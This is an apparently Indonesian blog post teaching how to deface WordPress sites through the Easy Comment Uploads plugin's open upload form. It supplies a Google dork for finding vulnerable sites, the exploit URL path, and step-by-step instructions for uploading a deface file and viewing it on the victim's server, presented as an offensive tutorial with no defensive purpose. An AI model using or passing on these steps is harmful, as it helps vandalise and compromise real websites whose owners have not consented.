Deface Exploit Wp Easy Comment Upload Plugin + Live Target


halo whats up exploiter, kali ini saya akan share tutorial deface metode wp easy comment upload plugin, metode ini sangat mudah, ok langsung aja.

#Google dork :
- inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php

#Exploit :
- /wp-content/plugins/easy-comment-uploads/upload-form.php

#Live Target :

1. Dorking menggunakan dork diatas atau gunakan live target diatas.

2. kalau sudah masukkan exploit di akhir domain. contoh : target.com/wp-content/plugins/easy-comment-uploads/upload-form.php

3. jika vuln maka tampilannya sperti gambar di bawah ini


4. upload script deface berformat .txt

5. jika sudah langsung akses saja, dengan cara 
target.com/wp-content/uploads/tahun/bulan/scriptkalian.txt
contoh : target.com/wp-content/uploads/2020/03/lix.txt

6. dan taraa berhasil

Hasil Saya :

Ok sekian dari saya, terimakasih

#No_IDentiTy ~ LinuXploit

0 Comments